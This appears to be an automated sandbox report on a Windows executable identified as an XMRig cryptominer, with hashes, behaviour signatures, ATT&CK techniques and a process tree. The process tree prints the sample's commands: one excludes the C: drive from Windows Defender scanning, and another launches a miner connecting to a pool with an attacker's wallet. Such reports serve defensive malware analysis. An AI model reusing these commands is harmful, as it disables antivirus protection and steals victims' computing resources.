Analysis

  • max time kernel
    148s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-03-2023 02:10

General

  • Target

    1d3329d2fc6d022e283a519b328991098f0d9c7bf01fa2eeaa941ec3bc44b2ef.exe

  • Size

    2.6MB

  • MD5

    e0a64ea350aed7cc5e867677944b03e3

  • SHA1

    e0f62ed674ba6c79b215d82babc733f05623ab24

  • SHA256

    1d3329d2fc6d022e283a519b328991098f0d9c7bf01fa2eeaa941ec3bc44b2ef

  • SHA512

    921c94526b0b30fa32d46d11474133cbbb69e2c816b26e54a7002649ad100787b83e33d7369119c4feb1462d8a8db58889355a030a2ba4fe0f1ca904472e1ccb

  • SSDEEP

    24576:q5vWSTfOvF//1SbrNnT/feTtJ2h8IYb2ny/v/LtGZsYjot0VHeaw5qGabocdcyoQ:q5vWSw0bUTWHMqT3dYMfY/HDr/G

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1d3329d2fc6d022e283a519b328991098f0d9c7bf01fa2eeaa941ec3bc44b2ef.exe
    "C:\Users\Admin\AppData\Local\Temp\1d3329d2fc6d022e283a519b328991098f0d9c7bf01fa2eeaa941ec3bc44b2ef.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1584
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 3; Set-MpPreference -ExclusionPath C:\
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4240
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 491o2KBK7gPMo1a81w9Dq3hfmJ5h5F8odXXp6o9CnqyqjGsP9TSqwEb7BJHM9ss3Ekium61Btg4kb4idgAfwTeRL2hqmHaY.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:1776

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    a3af0fe7f6bead950f076de281a5a1d2

    SHA1

    e55d189a5525b7871835548e5f777de0ff42e755

    SHA256

    ce484ca22f8966e31b9b5aafef1a970d37525122fb7c9d39976e743264f77890

    SHA512

    9818ad2387ceba8fe3afbe60070354c39eb13783653e8e28c84bd7e61678627942a6df06778d4e4b72d525c843d74bd97e4edc93af960e45500912e41c2c5693

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5wtbnwqg.kle.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1584-197-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-167-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-154-0x000001C0C24B0000-0x000001C0C24B1000-memory.dmp
    Filesize

    4KB

  • memory/1584-155-0x000001C0C24C0000-0x000001C0C256C000-memory.dmp
    Filesize

    688KB

  • memory/1584-157-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-201-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-2382-0x000001C0C1650000-0x000001C0C1660000-memory.dmp
    Filesize

    64KB

  • memory/1584-2372-0x000001C0C1650000-0x000001C0C1660000-memory.dmp
    Filesize

    64KB

  • memory/1584-156-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-159-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-161-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-163-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-165-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-203-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-169-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-171-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-173-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-175-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-177-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-179-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-180-0x000001C0C1650000-0x000001C0C1660000-memory.dmp
    Filesize

    64KB

  • memory/1584-182-0x000001C0C1650000-0x000001C0C1660000-memory.dmp
    Filesize

    64KB

  • memory/1584-183-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-185-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-187-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-189-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-191-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-193-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-195-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-135-0x000001C0C2200000-0x000001C0C2222000-memory.dmp
    Filesize

    136KB

  • memory/1584-199-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-2370-0x000001C0C1650000-0x000001C0C1660000-memory.dmp
    Filesize

    64KB

  • memory/1584-148-0x000001C0C1650000-0x000001C0C1660000-memory.dmp
    Filesize

    64KB

  • memory/1584-205-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-207-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-209-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-211-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-213-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-215-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-217-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-219-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-221-0x000001C0C3280000-0x000001C0C3358000-memory.dmp
    Filesize

    864KB

  • memory/1584-2350-0x000001C0C1650000-0x000001C0C1660000-memory.dmp
    Filesize

    64KB

  • memory/1584-2351-0x000001C0C1650000-0x000001C0C1660000-memory.dmp
    Filesize

    64KB

  • memory/1584-2352-0x000001C0C1650000-0x000001C0C1660000-memory.dmp
    Filesize

    64KB

  • memory/1584-2353-0x000001C0C1650000-0x000001C0C1660000-memory.dmp
    Filesize

    64KB

  • memory/1584-134-0x000001C0C1650000-0x000001C0C1660000-memory.dmp
    Filesize

    64KB

  • memory/1584-133-0x000001C0A6220000-0x000001C0A64C8000-memory.dmp
    Filesize

    2.7MB

  • memory/1584-2369-0x000001C0C1650000-0x000001C0C1660000-memory.dmp
    Filesize

    64KB

  • memory/1776-2388-0x0000021BE9E70000-0x0000021BE9E90000-memory.dmp
    Filesize

    128KB

  • memory/1776-2385-0x0000000140000000-0x00000001407CD000-memory.dmp
    Filesize

    7.8MB

  • memory/1776-2383-0x0000000140000000-0x00000001407CD000-memory.dmp
    Filesize

    7.8MB

  • memory/1776-2389-0x0000021BE9E70000-0x0000021BE9E90000-memory.dmp
    Filesize

    128KB

  • memory/1776-2384-0x0000021BE9E30000-0x0000021BE9E70000-memory.dmp
    Filesize

    256KB

  • memory/4240-2367-0x000002AB79FD0000-0x000002AB79FE0000-memory.dmp
    Filesize

    64KB

  • memory/4240-2368-0x000002AB79FD0000-0x000002AB79FE0000-memory.dmp
    Filesize

    64KB

  • memory/4240-2366-0x000002AB79FD0000-0x000002AB79FE0000-memory.dmp
    Filesize

    64KB

  • memory/4808-147-0x000001A91B440000-0x000001A91B450000-memory.dmp
    Filesize

    64KB

  • memory/4808-149-0x000001A91B440000-0x000001A91B450000-memory.dmp
    Filesize

    64KB

  • memory/4808-146-0x000001A91B440000-0x000001A91B450000-memory.dmp
    Filesize

    64KB

  • memory/4808-145-0x000001A91B440000-0x000001A91B450000-memory.dmp
    Filesize

    64KB

  • memory/4808-150-0x000001A91B440000-0x000001A91B450000-memory.dmp
    Filesize

    64KB

  • memory/4808-151-0x000001A91B440000-0x000001A91B450000-memory.dmp
    Filesize

    64KB